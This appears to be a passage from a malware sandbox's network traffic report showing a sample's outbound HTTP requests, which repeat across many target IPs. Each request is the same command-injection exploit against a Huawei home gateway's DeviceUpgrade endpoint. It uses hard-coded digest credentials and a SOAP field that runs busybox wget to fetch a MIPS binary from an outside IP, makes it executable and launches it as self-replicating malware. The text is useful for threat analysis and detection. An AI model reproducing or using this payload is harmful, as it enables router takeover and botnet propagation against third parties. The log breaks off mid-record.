                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1512192.168.2.1344050197.114.89.25237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.583790064 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1513192.168.2.1338436152.148.79.2537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.583806038 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1514192.168.2.1344074219.196.128.5237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.583822012 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1515192.168.2.1334592157.98.119.9637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.583852053 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1516192.168.2.1336748189.212.3.137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.583864927 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1517192.168.2.134616238.18.96.15537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.583877087 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1518192.168.2.135780041.16.123.2237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.583897114 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1519192.168.2.1334952192.49.181.25537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.583914995 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1520192.168.2.1345504157.214.227.7037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.583935976 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1521192.168.2.135530041.242.134.16837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.583961010 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 